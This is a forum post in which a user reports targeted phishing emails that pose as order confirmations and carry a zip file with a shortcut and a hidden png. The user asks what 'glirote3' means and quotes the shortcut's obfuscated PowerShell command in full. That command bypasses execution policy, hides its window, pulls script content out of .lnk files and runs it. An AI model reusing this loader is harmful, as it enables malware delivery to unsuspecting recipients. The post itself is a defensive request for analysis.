Has anyone any ideas what "glirote3" -- malware powershell link.
Over the last couple of weeks I have received a couple of targetted emails with links to a zip file which contains a shortcut and a png file. When I say targetted they have the have my name and the main office telephone number along with postcode (i.e. zip code). Each email claims to be an order confirmation . The png file for some reason is marked as hidden, and the shortcut is actually a powershell link.

The link (reported to godaddy so may go soon hopefully)is:


The shortcut powershell command is:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c $no="po"wer"shel"l -win hi"dd"en -c "fi"nds"tr /s glirote3 $env:userprofile\*.lnk > $env:userprofile\Downloads\vvv"."p"s"1; & $env:userprofile\Downloads\vvv"."p"s"1"; start-process $no

Is anyone aware what glirote3 is as I am not turning up any references from a quick search

14 Posts

Sign Up for Free or Log In to start participating in the conversation!